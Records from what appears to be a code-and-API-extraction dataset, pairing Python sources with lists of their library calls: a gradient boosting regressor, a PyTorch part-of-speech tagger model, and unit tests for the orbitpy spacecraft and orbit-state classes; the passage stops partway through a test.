[((1015, 1033), 'gym.make', 'gym.make', (['ENV_NAME'], {}), '(ENV_NAME)\n', (1023, 1033), False, 'import gym\n'), ((1061, 1085), 'numpy.random.seed', 'np.random.seed', (['(98283476)'], {}), '(98283476)\n', (1075, 1085), True, 'import numpy as np\n'), ((1422, 1434), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1432, 1434), False, 'from keras.models import Sequential\n'), ((1802, 1848), 'rl.memory.SequentialMemory', 'SequentialMemory', ([], {'limit': '(50000)', 'window_length': '(1)'}), '(limit=50000, window_length=1)\n', (1818, 1848), False, 'from rl.memory import SequentialMemory\n'), ((1858, 1876), 'rl.policy.BoltzmannQPolicy', 'BoltzmannQPolicy', ([], {}), '()\n', (1874, 1876), False, 'from rl.policy import BoltzmannQPolicy\n'), ((1979, 2158), 'rl.agents.dqn.DQNAgent', 'DQNAgent', ([], {'model': 'model', 'nb_actions': 'nb_actions', 'memory': 'memory', 'nb_steps_warmup': '(100)', 'enable_dueling_network': '(True)', 'dueling_type': '"""avg"""', 'target_model_update': '(0.01)', 'policy': 'policy'}), "(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup\n =100, enable_dueling_network=True, dueling_type='avg',\n target_model_update=0.01, policy=policy)\n", (1987, 2158), False, 'from rl.agents.dqn import DQNAgent\n'), ((1445, 1500), 'keras.layers.Flatten', 'Flatten', ([], {'input_shape': '((1,) + env.observation_space.shape)'}), '(input_shape=(1,) + env.observation_space.shape)\n', (1452, 1500), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1512, 1521), 'keras.layers.Dense', 'Dense', (['(16)'], {}), '(16)\n', (1517, 1521), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1533, 1551), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (1543, 1551), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1563, 1572), 'keras.layers.Dense', 'Dense', (['(16)'], {}), '(16)\n', (1568, 1572), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1584, 1602), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (1594, 1602), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1614, 1653), 'keras.layers.Dense', 'Dense', (['nb_actions'], {'activation': '"""sigmoid"""'}), "(nb_actions, activation='sigmoid')\n", (1619, 1653), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((2177, 2191), 'keras.optimizers.Adam', 'Adam', ([], {'lr': '(0.001)'}), '(lr=0.001)\n', (2181, 2191), False, 'from keras.optimizers import Adam\n'), ((406, 448), 'gym.ObservationWrapper.__init__', 'gym.ObservationWrapper.__init__', (['self', 'env'], {}), '(self, env)\n', (437, 448), False, 'import gym\n'), ((482, 523), 'gym.spaces.Box', 'spaces.Box', ([], {'low': '(0.0)', 'high': '(1.0)', 'shape': '(9,)'}), '(low=0.0, high=1.0, shape=(9,))\n', (492, 523), False, 'from gym import spaces\n')]
|
from pyml.tree.regression import DecisionTreeRegressor
from pyml.metrics.pairwise import euclidean_distance
import numpy as np
# TODO: 使用平方误差,还是绝对值误差,还是Huber Loss
class GradientBoostingRegression():
def __init__(self,
learning_rate=0.1,
base_estimator=DecisionTreeRegressor,
n_estimators=500,
random_state=None
):
self.estimators = []
self.n_estimators = n_estimators
self.base_estimator = base_estimator
self.learning_rate = learning_rate
self.parameters = {
'f' : [],
'lr' : []
}
# key='f' : a list of estimator
# key='lr' : a list of learning_rate
def optimizer(self, X, Y, watch=False):
"""
训练一次
"""
cur_Y_pred = self.predict(X)
# print('cur_Y_pred : ', cur_Y_pred)
# 计算cost
cost = euclidean_distance(cur_Y_pred, Y)
# 计算残差 or 计算梯度
d_fx = cur_Y_pred - Y
# print('d_fx : ', d_fx)
# 梯度取负数
d_fx = - d_fx
# 计算学习率,这里默认为初始化参数
lr = self.learning_rate
# 创建一个新回归器,去拟合梯度
new_estimator = self.base_estimator()
new_estimator.fit(X,d_fx)
self.parameters['f'].append(new_estimator)
self.parameters['lr'].append(lr)
return cost
def fit(self, X, Y, watch=False):
init_estimator = self.base_estimator()
init_estimator.fit(X,Y)
self.parameters['f'].append(init_estimator)
self.parameters['lr'].append(1)
for i in range(self.n_estimators):
cost = self.optimizer(X,Y)
if i % 10 == 0:
print('train {}/{} current cost : {}'.format(i,self.n_estimators,cost))
def predict(self, X_pred):
"""
Parameters
-------------
X_pred : 2d array-like shape(n_samples, n_feature)
Returns
--------------
pre_Y : 1d array-like shape(n_samples,)
"""
# the number of features should be consistent.
total_num = X_pred.shape[0]
Y_pred = np.zeros((total_num))
for cur_estimator, lr in zip(self.parameters['f'], self.parameters['lr']):
Y_pred += cur_estimator.predict(X_pred) * lr
return Y_pred
if __name__ == '__main__':
mini_train_X = np.array([
[1,2,3,4,5,6,7,8],
[2,3,4,5,6,7,8,9],
[3,4,5,6,7,8,9,10],
[4,5,6,7,8,9,10,11],
[5,6,7,8,9,10,11,12],
[6,7,8,9,10,11,12,13],
[7,8,9,10,11,12,13,14]
])
mini_train_Y = np.array([
1.5,2.5,3.5,4.5,5.5,6.5,7.5
])
mini_test_X = np.array([
[2,3,4,5,6,7.5,8,9],
[4,5,6,7.5,8,9,10,11]
])
mini_standard_out_Y = np.array([
2.5,4.5
])
rgs = GradientBoostingRegression()
rgs.fit(mini_train_X,mini_train_Y)
print(rgs.predict(mini_test_X))
|
[
"numpy.zeros",
"pyml.metrics.pairwise.euclidean_distance",
"numpy.array"
] |
[((2317, 2533), 'numpy.array', 'np.array', (['[[1, 2, 3, 4, 5, 6, 7, 8], [2, 3, 4, 5, 6, 7, 8, 9], [3, 4, 5, 6, 7, 8, 9, \n 10], [4, 5, 6, 7, 8, 9, 10, 11], [5, 6, 7, 8, 9, 10, 11, 12], [6, 7, 8,\n 9, 10, 11, 12, 13], [7, 8, 9, 10, 11, 12, 13, 14]]'], {}), '([[1, 2, 3, 4, 5, 6, 7, 8], [2, 3, 4, 5, 6, 7, 8, 9], [3, 4, 5, 6, \n 7, 8, 9, 10], [4, 5, 6, 7, 8, 9, 10, 11], [5, 6, 7, 8, 9, 10, 11, 12],\n [6, 7, 8, 9, 10, 11, 12, 13], [7, 8, 9, 10, 11, 12, 13, 14]])\n', (2325, 2533), True, 'import numpy as np\n'), ((2557, 2602), 'numpy.array', 'np.array', (['[1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5]'], {}), '([1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5])\n', (2565, 2602), True, 'import numpy as np\n'), ((2629, 2697), 'numpy.array', 'np.array', (['[[2, 3, 4, 5, 6, 7.5, 8, 9], [4, 5, 6, 7.5, 8, 9, 10, 11]]'], {}), '([[2, 3, 4, 5, 6, 7.5, 8, 9], [4, 5, 6, 7.5, 8, 9, 10, 11]])\n', (2637, 2697), True, 'import numpy as np\n'), ((2732, 2752), 'numpy.array', 'np.array', (['[2.5, 4.5]'], {}), '([2.5, 4.5])\n', (2740, 2752), True, 'import numpy as np\n'), ((877, 910), 'pyml.metrics.pairwise.euclidean_distance', 'euclidean_distance', (['cur_Y_pred', 'Y'], {}), '(cur_Y_pred, Y)\n', (895, 910), False, 'from pyml.metrics.pairwise import euclidean_distance\n'), ((2086, 2105), 'numpy.zeros', 'np.zeros', (['total_num'], {}), '(total_num)\n', (2094, 2105), True, 'import numpy as np\n')]
|
# was stanza.models.pos.model
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence, pack_sequence, PackedSequence
from biaffine import BiaffineScorer
from hlstm import HighwayLSTM
from dropout import WordDropout
from char_model import CharacterModel
class Tagger(nn.Module):
def __init__(self, args, vocab, emb_matrix=None):
super().__init__()
self.vocab = vocab
self.args = args
self.use_pretrained = emb_matrix is not None
self.use_char = args['char_emb_dim'] > 0
self.use_word = args['word_emb_dim'] > 0
self.share_hid = args['pos_emb_dim'] < 1
self.unsaved_modules = []
def add_unsaved_module(name, module):
self.unsaved_modules += [name]
setattr(self, name, module)
# input layers
input_size = 0
if self.use_word:
# frequent word embeddings
self.word_emb = nn.Embedding(len(vocab['word']), self.args['word_emb_dim'], padding_idx=0)
input_size += self.args['word_emb_dim']
if not self.share_hid:
# pos embeddings
self.pos_emb = nn.Embedding(len(vocab['pos']), self.args['pos_emb_dim'], padding_idx=0)
if self.use_char:
self.charmodel = CharacterModel(args, vocab, bidirectional=args['char_bidir'])
self.trans_char = nn.Linear(self.charmodel.num_dir * self.args['char_hidden_dim'], self.args['transformed_dim'], bias=False)
input_size += self.args['transformed_dim']
if self.use_pretrained:
# pretrained embeddings, by default this won't be saved into model file
add_unsaved_module('pretrained_emb', nn.Embedding.from_pretrained(torch.from_numpy(emb_matrix), freeze=True))
self.trans_pretrained = nn.Linear(emb_matrix.shape[1], self.args['transformed_dim'], bias=False)
input_size += self.args['transformed_dim']
# recurrent layers
self.taggerlstm = HighwayLSTM(input_size, self.args['tag_hidden_dim'], self.args['tag_num_layers'], batch_first=True, bidirectional=True, dropout=self.args['dropout'], rec_dropout=self.args['tag_rec_dropout'], highway_func=torch.tanh)
self.drop_replacement = nn.Parameter(torch.randn(input_size) / np.sqrt(input_size))
self.taggerlstm_h_init = nn.Parameter(torch.zeros(2 * self.args['tag_num_layers'], 1, self.args['tag_hidden_dim']))
self.taggerlstm_c_init = nn.Parameter(torch.zeros(2 * self.args['tag_num_layers'], 1, self.args['tag_hidden_dim']))
# classifiers
self.pos_hid = nn.Linear(self.args['tag_hidden_dim'] * 2, self.args['deep_biaff_hidden_dim'])
self.pos_clf = nn.Linear(self.args['deep_biaff_hidden_dim'], len(vocab['pos']))
self.pos_clf.weight.data.zero_()
self.pos_clf.bias.data.zero_()
if self.share_hid:
clf_constructor = lambda insize, outsize: nn.Linear(insize, outsize)
else:
self.feats_hid = nn.Linear(self.args['tag_hidden_dim'] * 2, self.args['composite_deep_biaff_hidden_dim'])
clf_constructor = lambda insize, outsize: BiaffineScorer(insize, self.args['pos_emb_dim'], outsize)
self.feats_clf = nn.ModuleList()
for l in vocab['feats'].lens():
if self.share_hid:
self.feats_clf.append(clf_constructor(self.args['deep_biaff_hidden_dim'], l))
self.feats_clf[-1].weight.data.zero_()
self.feats_clf[-1].bias.data.zero_()
else:
self.feats_clf.append(clf_constructor(self.args['composite_deep_biaff_hidden_dim'], l))
# criterion
self.crit = nn.CrossEntropyLoss(ignore_index=0) # ignore padding
self.drop = nn.Dropout(args['dropout'])
self.worddrop = WordDropout(args['word_dropout'])
def forward(self, word, word_mask, wordchars, wordchars_mask, pos, feats, pretrained, word_orig_idx, sentlens, wordlens):
def pack(x):
return pack_padded_sequence(x, sentlens, batch_first=True)
def get_batch_sizes(sentlens):
b = []
for i in range(max(sentlens)):
c = len([x for x in sentlens if x > i])
b.append(c)
return torch.tensor(b)
def pad(x):
return pad_packed_sequence(PackedSequence(x, batch_sizes), batch_first=True)[0]
inputs = []
if self.use_word:
word_emb = self.word_emb(word)
word_emb = pack(word_emb)
inputs += [word_emb]
batch_sizes = word_emb.batch_sizes
else:
batch_sizes = get_batch_sizes(sentlens)
if self.use_pretrained:
pretrained_emb = self.pretrained_emb(pretrained)
pretrained_emb = self.trans_pretrained(pretrained_emb)
pretrained_emb = pack(pretrained_emb)
inputs += [pretrained_emb]
if self.use_char:
char_reps = self.charmodel(wordchars, wordchars_mask, word_orig_idx, sentlens, wordlens)
char_reps = PackedSequence(self.trans_char(self.drop(char_reps.data)), char_reps.batch_sizes)
inputs += [char_reps]
lstm_inputs = torch.cat([x.data for x in inputs], 1)
lstm_inputs = self.worddrop(lstm_inputs, self.drop_replacement)
lstm_inputs = self.drop(lstm_inputs)
lstm_inputs = PackedSequence(lstm_inputs, inputs[0].batch_sizes)
lstm_outputs, _ = self.taggerlstm(lstm_inputs, sentlens, hx=(self.taggerlstm_h_init.expand(2 * self.args['tag_num_layers'], word.size(0), self.args['tag_hidden_dim']).contiguous(), self.taggerlstm_c_init.expand(2 * self.args['tag_num_layers'], word.size(0), self.args['tag_hidden_dim']).contiguous()))
lstm_outputs = lstm_outputs.data
pos_hid = F.relu(self.pos_hid(self.drop(lstm_outputs)))
pos_pred = self.pos_clf(self.drop(pos_hid))
preds = [pad(pos_pred).max(2)[1]]
pos = pack(pos).data
loss = self.crit(pos_pred.view(-1, pos_pred.size(-1)), pos.view(-1))
if self.share_hid:
feats_hid = pos_hid
clffunc = lambda clf, hid: clf(self.drop(hid))
else:
feats_hid = F.relu(self.feats_hid(self.drop(lstm_outputs)))
# TODO: self.training is never set, but check if this is a bug
#if self.training: pos_emb = self.pos_emb(pos) else:
pos_emb = self.pos_emb(pos_pred.max(1)[1])
clffunc = lambda clf, hid: clf(self.drop(hid), self.drop(pos_emb))
feats_preds = []
feats = pack(feats).data
for i in range(len(self.vocab['feats'])):
feats_pred = clffunc(self.feats_clf[i], feats_hid)
loss += self.crit(feats_pred.view(-1, feats_pred.size(-1)), feats[:, i].view(-1))
feats_preds.append(pad(feats_pred).max(2, keepdim=True)[1])
preds.append(torch.cat(feats_preds, 2))
return loss, preds
if __name__ == "__main__":
print("This file cannot be used on its own.")
print("To launch the tagger, use tagger.py instead of model.py")
|
[
"torch.nn.Dropout",
"torch.nn.utils.rnn.pack_padded_sequence",
"torch.from_numpy",
"biaffine.BiaffineScorer",
"torch.nn.ModuleList",
"dropout.WordDropout",
"torch.nn.CrossEntropyLoss",
"torch.cat",
"torch.nn.utils.rnn.PackedSequence",
"torch.zeros",
"torch.randn",
"torch.nn.Linear",
"hlstm.HighwayLSTM",
"numpy.sqrt",
"torch.tensor",
"char_model.CharacterModel"
] |
[((2077, 2308), 'hlstm.HighwayLSTM', 'HighwayLSTM', (['input_size', "self.args['tag_hidden_dim']", "self.args['tag_num_layers']"], {'batch_first': '(True)', 'bidirectional': '(True)', 'dropout': "self.args['dropout']", 'rec_dropout': "self.args['tag_rec_dropout']", 'highway_func': 'torch.tanh'}), "(input_size, self.args['tag_hidden_dim'], self.args[\n 'tag_num_layers'], batch_first=True, bidirectional=True, dropout=self.\n args['dropout'], rec_dropout=self.args['tag_rec_dropout'], highway_func\n =torch.tanh)\n", (2088, 2308), False, 'from hlstm import HighwayLSTM\n'), ((2680, 2758), 'torch.nn.Linear', 'nn.Linear', (["(self.args['tag_hidden_dim'] * 2)", "self.args['deep_biaff_hidden_dim']"], {}), "(self.args['tag_hidden_dim'] * 2, self.args['deep_biaff_hidden_dim'])\n", (2689, 2758), True, 'import torch.nn as nn\n'), ((3306, 3321), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (3319, 3321), True, 'import torch.nn as nn\n'), ((3758, 3793), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {'ignore_index': '(0)'}), '(ignore_index=0)\n', (3777, 3793), True, 'import torch.nn as nn\n'), ((3831, 3858), 'torch.nn.Dropout', 'nn.Dropout', (["args['dropout']"], {}), "(args['dropout'])\n", (3841, 3858), True, 'import torch.nn as nn\n'), ((3883, 3916), 'dropout.WordDropout', 'WordDropout', (["args['word_dropout']"], {}), "(args['word_dropout'])\n", (3894, 3916), False, 'from dropout import WordDropout\n'), ((5286, 5324), 'torch.cat', 'torch.cat', (['[x.data for x in inputs]', '(1)'], {}), '([x.data for x in inputs], 1)\n', (5295, 5324), False, 'import torch\n'), ((5464, 5514), 'torch.nn.utils.rnn.PackedSequence', 'PackedSequence', (['lstm_inputs', 'inputs[0].batch_sizes'], {}), '(lstm_inputs, inputs[0].batch_sizes)\n', (5478, 5514), False, 'from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence, pack_sequence, PackedSequence\n'), ((1366, 1427), 'char_model.CharacterModel', 'CharacterModel', (['args', 'vocab'], {'bidirectional': "args['char_bidir']"}), "(args, vocab, bidirectional=args['char_bidir'])\n", (1380, 1427), False, 'from char_model import CharacterModel\n'), ((1458, 1569), 'torch.nn.Linear', 'nn.Linear', (["(self.charmodel.num_dir * self.args['char_hidden_dim'])", "self.args['transformed_dim']"], {'bias': '(False)'}), "(self.charmodel.num_dir * self.args['char_hidden_dim'], self.args[\n 'transformed_dim'], bias=False)\n", (1467, 1569), True, 'import torch.nn as nn\n'), ((1895, 1967), 'torch.nn.Linear', 'nn.Linear', (['emb_matrix.shape[1]', "self.args['transformed_dim']"], {'bias': '(False)'}), "(emb_matrix.shape[1], self.args['transformed_dim'], bias=False)\n", (1904, 1967), True, 'import torch.nn as nn\n'), ((2432, 2508), 'torch.zeros', 'torch.zeros', (["(2 * self.args['tag_num_layers'])", '(1)', "self.args['tag_hidden_dim']"], {}), "(2 * self.args['tag_num_layers'], 1, self.args['tag_hidden_dim'])\n", (2443, 2508), False, 'import torch\n'), ((2556, 2632), 'torch.zeros', 'torch.zeros', (["(2 * self.args['tag_num_layers'])", '(1)', "self.args['tag_hidden_dim']"], {}), "(2 * self.args['tag_num_layers'], 1, self.args['tag_hidden_dim'])\n", (2567, 2632), False, 'import torch\n'), ((3079, 3172), 'torch.nn.Linear', 'nn.Linear', (["(self.args['tag_hidden_dim'] * 2)", "self.args['composite_deep_biaff_hidden_dim']"], {}), "(self.args['tag_hidden_dim'] * 2, self.args[\n 'composite_deep_biaff_hidden_dim'])\n", (3088, 3172), True, 'import torch.nn as nn\n'), ((4085, 4136), 'torch.nn.utils.rnn.pack_padded_sequence', 'pack_padded_sequence', (['x', 'sentlens'], {'batch_first': '(True)'}), '(x, sentlens, batch_first=True)\n', (4105, 4136), False, 'from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence, pack_sequence, PackedSequence\n'), ((4342, 4357), 'torch.tensor', 'torch.tensor', (['b'], {}), '(b)\n', (4354, 4357), False, 'import torch\n'), ((6972, 6997), 'torch.cat', 'torch.cat', (['feats_preds', '(2)'], {}), '(feats_preds, 2)\n', (6981, 6997), False, 'import torch\n'), ((2339, 2362), 'torch.randn', 'torch.randn', (['input_size'], {}), '(input_size)\n', (2350, 2362), False, 'import torch\n'), ((2365, 2384), 'numpy.sqrt', 'np.sqrt', (['input_size'], {}), '(input_size)\n', (2372, 2384), True, 'import numpy as np\n'), ((3009, 3035), 'torch.nn.Linear', 'nn.Linear', (['insize', 'outsize'], {}), '(insize, outsize)\n', (3018, 3035), True, 'import torch.nn as nn\n'), ((3222, 3279), 'biaffine.BiaffineScorer', 'BiaffineScorer', (['insize', "self.args['pos_emb_dim']", 'outsize'], {}), "(insize, self.args['pos_emb_dim'], outsize)\n", (3236, 3279), False, 'from biaffine import BiaffineScorer\n'), ((1815, 1843), 'torch.from_numpy', 'torch.from_numpy', (['emb_matrix'], {}), '(emb_matrix)\n', (1831, 1843), False, 'import torch\n'), ((4418, 4448), 'torch.nn.utils.rnn.PackedSequence', 'PackedSequence', (['x', 'batch_sizes'], {}), '(x, batch_sizes)\n', (4432, 4448), False, 'from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence, pack_sequence, PackedSequence\n')]
|
"""Unit tests for orbitpy.util module.
"""
import unittest
import numpy as np
from numpy.core.numeric import tensordot
from instrupy.util import Orientation
from instrupy import Instrument
from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft
import orbitpy.util
import propcov
from util.spacecrafts import spc1_json, spc2_json, spc3_json
class TestOrbitState(unittest.TestCase):
def test_date_from_dict(self):
x = OrbitState.date_from_dict({"@type":"JULIAN_DATE_UT1", "jd":2459270.75})
self.assertIsInstance(x, propcov.AbsoluteDate)
y = OrbitState.date_from_dict({"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0})
self.assertIsInstance(y, propcov.AbsoluteDate)
self.assertEqual(x, y)
def test_state_from_dict(self):
x = OrbitState.state_from_dict({"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6867, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25})
self.assertIsInstance(x, propcov.OrbitState)
cart_state = x.GetCartesianState().GetRealArray()
y = OrbitState.state_from_dict({"@type": "CARTESIAN_EARTH_CENTERED_INERTIAL", "x": cart_state[0], "y": cart_state[1], "z": cart_state[2], "vx": cart_state[3], "vy": cart_state[4], "vz": cart_state[5]})
self.assertIsInstance(y, propcov.OrbitState)
self.assertEqual(x, y)
def test_date_to_dict(self): #@TODO
pass
def test_state_to_dict(self): #@TODO
pass
def test_get_julian_date(self): #@TODO
pass
def test_get_cartesian_earth_centered_inertial_state(self): #@TODO
pass
def test_get_keplerian_earth_centered_inertial_state(self): #@TODO
pass
def test_from_dict(self):
# Julian date, Cartesian state
o = OrbitState.from_dict({"date":{"@type":"JULIAN_DATE_UT1", "jd":2459270.75},
"state":{"@type": "CARTESIAN_EARTH_CENTERED_INERTIAL", "x": 6878.137, "y": 0, "z": 0, "vx": 0, "vy": 7.6126, "vz": 0},
"@id": 123})
self.assertIsInstance(o, OrbitState)
self.assertEqual(o._id, 123)
self.assertEqual(o.date, propcov.AbsoluteDate.fromJulianDate(2459270.75))
self.assertEqual(o.state, propcov.OrbitState.fromCartesianState(propcov.Rvector6([6878.137,0,0,0,7.6126,0])))
# Gregorian date, Keplerian state
o = OrbitState.from_dict({"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0},
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25},
})
self.assertIsInstance(o, OrbitState)
self.assertIsNone(o._id)
self.assertEqual(o.date, propcov.AbsoluteDate.fromGregorianDate(2021, 2, 25, 6 ,0, 0))
self.assertEqual(o.state, propcov.OrbitState.fromKeplerianState(6878.137, 0.001, np.deg2rad(45), np.deg2rad(35), np.deg2rad(145), np.deg2rad(-25)))
def test_to_dict(self): #@TODO test Keplerian state output
# Input: Julian date, Cartesian state
o = OrbitState.from_dict({"date":{"@type":"JULIAN_DATE_UT1", "jd":2459270.75},
"state":{"@type": "CARTESIAN_EARTH_CENTERED_INERTIAL", "x": 6878.137, "y": 0, "z": 0, "vx": 0, "vy": 7.6126, "vz": 0},
})
d = o.to_dict()
self.assertEqual(d["date"]["@type"], "JULIAN_DATE_UT1")
self.assertEqual(d["date"]["jd"], 2459270.75)
self.assertEqual(d["state"]["@type"], "CARTESIAN_EARTH_CENTERED_INERTIAL")
self.assertAlmostEqual(d["state"]["x"], 6878.137)
self.assertEqual(d["state"]["y"], 0)
self.assertEqual(d["state"]["z"], 0)
self.assertEqual(d["state"]["vx"], 0)
self.assertEqual(d["state"]["vy"], 7.6126)
self.assertEqual(d["state"]["vz"], 0)
self.assertIsNone(d["@id"])
# Input: Gregorian date, Keplerian state
o = OrbitState.from_dict({"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0},
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25},
"@id": "123"})
d = o.to_dict()
date = o.get_julian_date()
state = o.get_cartesian_earth_centered_inertial_state()
self.assertEqual(d["date"]["@type"], "JULIAN_DATE_UT1")
self.assertEqual(d["date"]["jd"], date)
self.assertEqual(d["state"]["@type"], "CARTESIAN_EARTH_CENTERED_INERTIAL")
self.assertAlmostEqual(d["state"]["x"], state[0])
self.assertEqual(d["state"]["y"], state[1])
self.assertEqual(d["state"]["z"], state[2])
self.assertEqual(d["state"]["vx"], state[3])
self.assertEqual(d["state"]["vy"], state[4])
self.assertEqual(d["state"]["vz"], state[5])
self.assertEqual(d["@id"], "123")
class TestSpacecraftBus(unittest.TestCase):
def test_from_json(self):
# typical case
o = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}')
self.assertEqual(o.name, "BlueCanyon")
self.assertEqual(o.mass, 20)
self.assertEqual(o.volume, 0.5)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame":"Nadir_pointing", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}))
self.assertIsNone(o.solarPanelConfig)
self.assertEqual(o._id, 123)
# check default orientation
o = SpacecraftBus.from_json('{"name": "Microsat", "mass": 100, "volume": 1}')
self.assertEqual(o.name, "Microsat")
self.assertEqual(o.mass, 100)
self.assertEqual(o.volume, 1)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame":"Nadir_pointing", "convention": "REF_FRAME_ALIGNED"}))
self.assertIsNone(o.solarPanelConfig)
self.assertIsNone(o._id)
# side look orientation
o = SpacecraftBus.from_json('{"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK", "sideLookAngle":-10}, "@id":123}')
self.assertIsNone(o.name)
self.assertIsNone(o.mass)
self.assertIsNone(o.volume)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame":"Nadir_pointing", "convention": "SIDE_LOOK", "sideLookAngle":-10}))
self.assertIsNone(o.solarPanelConfig)
self.assertEqual(o._id, 123)
# Euler rotation specification, ECI frame
o = SpacecraftBus.from_json('{"orientation":{"referenceFrame": "EARTH_CENTERED_INERTIAL", "convention": "XYZ","xRotation":10,"yRotation":-10.4,"zRotation":20.78}}')
self.assertIsNone(o.name)
self.assertIsNone(o.mass)
self.assertIsNone(o.volume)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame":"EARTH_CENTERED_INERTIAL", "convention": "XYZ","xRotation":10,"yRotation":-10.4,"zRotation":20.78}))
self.assertIsNone(o.solarPanelConfig)
self.assertIsNone(o._id)
def test_to_dict(self):
# typical case
o = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}')
o_dict = o.to_dict()
self.assertEqual(o_dict['name'], 'BlueCanyon')
self.assertEqual(o_dict['mass'], 20)
self.assertEqual(o_dict['volume'], 0.5)
self.assertIsNone(o_dict['solarPanelConfig'])
self.assertEqual(o_dict['orientation']['eulerAngle1'], 0)
self.assertEqual(o_dict['orientation']['eulerAngle2'], 0)
self.assertEqual(o_dict['orientation']['eulerAngle3'], 0)
self.assertEqual(o_dict['orientation']['eulerSeq1'], 1)
self.assertEqual(o_dict['orientation']['eulerSeq2'], 2)
self.assertEqual(o_dict['orientation']['eulerSeq3'], 3)
self.assertEqual(o_dict['orientation']['@id'], 'abc')
self.assertEqual(o_dict['@id'], 123)
def test___eq_(self):
# typical case, note that "@id" can be different.
o1 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}')
o2 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":"abc"}')
self.assertEqual(o1, o2)
o2 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 10, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}')
self.assertNotEqual(o1, o2)
# Equivalent orientation specifications in different input format
o1 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED"}, "@id":123}')
o2 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "XYZ","xRotation":0,"yRotation":0,"zRotation":0}, "@id":123}')
self.assertEqual(o1, o2)
class TestSpacecraft(unittest.TestCase):
def test_from_json(self):
spc1 = Spacecraft.from_json(spc1_json)
spc2 = Spacecraft.from_json(spc2_json)
spc3 = Spacecraft.from_json(spc3_json)
# typical case 1 instrument
self.assertEqual(spc1.name, "Mars")
self.assertEqual(spc1.spacecraftBus, SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}'))
self.assertEqual(spc1.instrument, [Instrument.from_json('{"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}')])
self.assertEqual(spc1.orbitState, OrbitState.from_json('{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}'))
self.assertEqual(spc1._id, "sp1")
# no instruments
self.assertEqual(spc2.name, "Jupyter")
self.assertEqual(spc2.spacecraftBus, SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}'))
self.assertIsNone(spc2.instrument)
self.assertEqual(spc2.orbitState, OrbitState.from_json('{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
